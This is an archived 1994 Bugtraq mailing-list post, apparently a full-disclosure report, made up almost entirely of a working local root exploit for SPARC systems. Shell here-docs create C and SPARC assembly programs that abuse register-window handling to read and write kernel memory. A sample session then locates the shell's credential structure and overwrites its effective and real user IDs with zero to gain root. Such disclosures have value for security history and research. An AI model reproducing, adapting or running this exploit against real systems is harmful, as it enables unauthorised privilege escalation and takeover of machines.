Bugtraq mailing list archives
[Tim Newsham: ]
From: newsham () uhunix uhcc hawaii edu (Tim Newsham)
Date: Sun, 2 Oct 1994 08:18:56 -1000
cat > readc.c << _EOF_
main(argc, argv) char *argv[]; {
printf("0x%x\n", rdmem(strtoul(argv[1], 0, 0)));
}
_EOF_
cat > reads.s << _EOF_
.globl rdmem
rdmem:
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %sp, %i4
mov %o7, %i7
btst 4, %o0
andn %o0, 7, %fp
restore
bz,a .+12
mov %l0, %i0
mov %l1, %i0
mov %o4, %fp
retl
restore
_EOF_
cat > writec.c << _EOF_
main(argc, argv) char *argv[]; {
wrmem(strtoul(argv[1], 0, 0), strtoul(argv[2], 0, 0));
}
_EOF_
cat > writes.s << _EOF_
.globl wrmem
wrmem:
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %o1, %i1
mov %sp, %i4
mov %o7, %i7
btst 4, %o0
andn %o0, 7, %fp
restore
bz,a .+12
mov %o1, %l0
mov %o1, %l1
save %o4, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
save %sp, 64, %sp
restore
restore
restore
restore
restore
restore
restore
mov %o4, %fp
retl
restore
_EOF_
cc -o read readc.c reads.s
cc -o write writec.c writes.s
otsuka% ps -lp $$
F S UID PID PPID C PRI NI ADDR SZ WCHAN TTY TIME COMD
8 S 23384 641 1145 1 20 fcfd6800 374 fcfd69c8 console 0:01 csh
# Offset 0x28 is the pointer to the shell's ucred struct.
otsuka% ./read 0xfcfd6828
0xfcfbc380
# Offsets 0x4 and 0xc in the ucred contain the effective and real uid.
otsuka% ./write 0xfcfbc384 0
otsuka% ./write 0xfcfbc38c 0
whoami
Current thread:
- [Tim Newsham: ] Tim Newsham (Oct 02)
- <Possible follow-ups>
- [Tim Newsham: ] Tim Newsham (Oct 02)
- [Tim Newsham: ] Tim Newsham (Oct 02)
- [Tim Newsham: ] Brent Chapman (Oct 02)
- [Tim Newsham: ] Brent Chapman (Oct 02)